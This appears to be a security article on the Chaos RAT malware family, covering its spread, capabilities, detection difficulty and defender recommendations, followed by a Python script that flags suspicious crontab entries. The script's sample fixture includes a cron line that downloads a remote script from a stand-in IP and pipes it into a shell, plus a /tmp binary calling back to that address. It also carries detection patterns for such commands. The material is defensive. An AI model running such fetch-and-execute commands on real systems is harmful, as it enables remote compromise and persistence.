The Acronis TRU research team has discovered new variants of Chaos RAT that are targeting both Linux and Windows systems in recent attacks. Although this malware was first spotted in 2022, it has evolved over time, and by 2024, more sophisticated versions began to emerge. Now, in 2025, new samples continue to surface.
Additionally, TRU identified a critical vulnerability in the web panel of this RAT that could allow an attacker to execute code remotely—a serious threat. One of the latest versions even tricks victims into downloading what appears to be a network troubleshooting tool for Linux, but is actually part of the attack. In other words, their infection methods are becoming increasingly convincing.
According to the Acronis report: "Developed in Golang, Chaos RAT operates on both Windows and Linux, and is a prime example of how seemingly useful tools can end up being exploited by cybercriminals for nefarious purposes."
They also note that although its overall usage is not yet widespread, the recent samples prove that Chaos RAT remains active. And the worst part is that it often goes undetected, making it ideal for espionage, data theft, or even as a launchpad for more severe attacks such as ransomware.
If you're not familiar with it, Chaos RAT is an open-source remote access tool written in Golang, designed to give attackers full control over compromised systems. It draws inspiration from well-known tools like Cobalt Strike and Sliver, and includes a panel from which malicious payloads can be generated, sessions managed, and infected machines controlled.
Although malware written in Go is typically heavier and somewhat slower than that written in C++, its major advantage lies in its adaptability across multiple platforms and the speed with which it can be developed. That flexibility is precisely what makes it so attractive to those looking to launch attacks with minimal effort.
What Is Chaos RAT? From Legitimate Tool to Cyber Weapon
What began as a legitimate tool for remote system management has become a cybersecurity headache. Chaos RAT, being open-source, has been adopted and modified by various attacker groups for their own purposes. Although its development began around 2017, it wasn’t until late 2022 that it started being used actively in attacks—mainly targeting Linux systems in cryptocurrency mining campaigns.
Since then, its usage has only increased, and that should raise alarm bells: understanding how this RAT works, how it infiltrates systems, and how to defend against it is no longer optional.
How Does Chaos RAT Spread?
Typically, it arrives via phishing emails—the usual suspects: emails with links or attachments that appear harmless but hide unpleasant surprises. In its early campaigns, attackers used cron jobs (the Linux equivalent of scheduling automatic tasks) to keep updating the malware remotely without needing to re-enter the system. This allowed them to deploy a crypto miner or Chaos RAT itself and simply move on.
In many cases, the RAT was primarily used for system reconnaissance, gathering useful information before launching more aggressive attacks. For example, in a recent case in India, a file named NetworkAnalyzer.tar.gz was found containing Chaos RAT disguised as a harmless network diagnostic tool for Linux. This clearly shows that attackers are using social engineering to trick their victims.
What Can Chaos RAT Do?
Quite a lot, to be honest. It's a fairly comprehensive remote control tool. Among other capabilities, it can:
- Gather system and user information
- Take screenshots
- Restart or shut down the machine
- Lock or log off users (on Windows)
- Browse files, upload, download, or delete them
- Open URLs in the default browser
And it can do all this on both Windows and Linux systems, with some platform-specific functions. Essentially, it gives attackers full control of the infected device and free rein over any data they find.
Additionally, Chaos RAT enables remote file management, opening reverse shells (allowing command-line access to the victim’s machine), and creating network tunnels to hide traffic—ideal for spying, data theft, or even setting the stage for a ransomware attack.
Why Is It So Hard to Detect?
One of the main reasons is that it's open-source software. Anyone can take the code, tweak it, and release their own customized version. This means antivirus and other security solutions have a harder time identifying it, because each variant can look different even if it performs the same actions.
To make matters worse, Chaos RAT is written in Golang, a programming language that easily compiles cross-platform executables. Although Go-based programs tend to be larger and a bit slower than those written in other languages, they allow attackers to create versions for both Linux and Windows with minimal code changes. This speeds up the development and deployment of new variants.
Not Everything Open Source Is Good
As the Acronis report states: “A tool designed for developers can end up becoming a cybercriminal’s favorite toy.” And Chaos RAT is the perfect example. It features a simple web interface, offers full control over compromised systems, allows for remote command execution, file transfers, shell access, and much more.
In the wrong hands, open-source code becomes a weapon. Chaos RAT reminds us that what may be useful for legitimate system administration can also become a security nightmare when weaponized.
Thanks to its ability to deploy quickly, target Linux systems without raising alarms, and easily adapt to different environments, Chaos RAT continues to grow as a silent yet powerful threat.
Security Recommendations for Defense Teams
If you’re part of a company’s security team, here are some practical tips to protect against Chaos RAT:
- Block Known C2 Domains: Prevent the malware from communicating with the attackers’ servers by blocking known command-and-control domains associated with Chaos RAT.
- Monitor Scheduled Tasks in Linux: Pay close attention to the /etc/crontab file. Suspicious or unexpected entries could be a sign that something’s wrong.
- Use Security Tools Like Application Whitelisting and EDR: These can detect Golang-based malicious payloads. This type of malware often slips through undetected because it doesn't always raise obvious red flags.
- Train Users Not to Download Software from Unknown Sources: One click on the wrong file can open the door to an attacker.
- Keep the Chaos RAT Panel Patched and Updated: If you use the Chaos RAT panel for testing or research (e.g., as part of a red team), ensure it is always properly patched and up to date. You don’t want it turning against you.
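The cron-based persistence described earlier and the recommendation to watch /etc/crontab suggest a simple check. The script below is an added example, not code from the Acronis report or from Chaos RAT: it parses system-crontab lines from a constructed sample and flags commands that match a few defender heuristics (download piped into a shell, programs run from /tmp, callbacks to raw IP addresses). The sample entries, the 203.0.113.10 address, and the heuristics are all assumptions made for illustration.

```python
import re

# Constructed sample in /etc/crontab format (not taken from the article). The last
# two jobs model the remote "self-update" cron persistence the article describes.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
# m h dom mon dow user command
17 * * * *   root  cd / && run-parts --report /etc/cron.hourly
25 6 * * *   root  test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*/5 * * * *  root  curl -s http://203.0.113.10/update.sh | sh
@reboot      root  /tmp/.X11-unix/netanalyzer -c http://203.0.113.10:8080
"""

# Heuristics for cron commands worth a second look; each entry is (regex, reason).
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b"), "downloads and pipes straight into a shell"),
    (re.compile(r"\b(curl|wget)\b.*\bhttps?://"), "fetches content from a remote URL"),
    (re.compile(r"(^|\s)/(tmp|dev/shm|var/tmp)/"), "runs a program from a world-writable directory"),
    (re.compile(r"\bbase64\b.*-d\b"), "decodes base64 at run time"),
    (re.compile(r"\bhttps?://\d{1,3}(\.\d{1,3}){3}"), "contacts a raw IP address instead of a hostname"),
]

def parse_crontab(text):
    """Return (schedule, user, command) for each job line; skips comments and VAR=value lines."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        # Five time fields plus the user precede the command; @reboot-style lines have one schedule token.
        n = 2 if line.startswith("@") else 6
        fields = line.split(None, n)
        if len(fields) != n + 1:
            continue  # malformed job line
        jobs.append((" ".join(fields[:-2]), fields[-2], fields[-1]))
    return jobs

def flag_jobs(jobs):
    """Return [(command, [reasons])] for every job whose command trips at least one heuristic."""
    findings = []
    for _schedule, _user, command in jobs:
        reasons = [why for rx, why in SUSPICIOUS if rx.search(command)]
        if reasons:
            findings.append((command, reasons))
    return findings

if __name__ == "__main__":
    for command, reasons in flag_jobs(parse_crontab(SAMPLE_CRONTAB)):
        print(f"SUSPICIOUS: {command}\n    " + "\n    ".join(reasons))
```

To run it against a real host, replace SAMPLE_CRONTAB with the contents of /etc/crontab (and the files under /etc/cron.d, which use the same format); treat hits as leads for review, not verdicts.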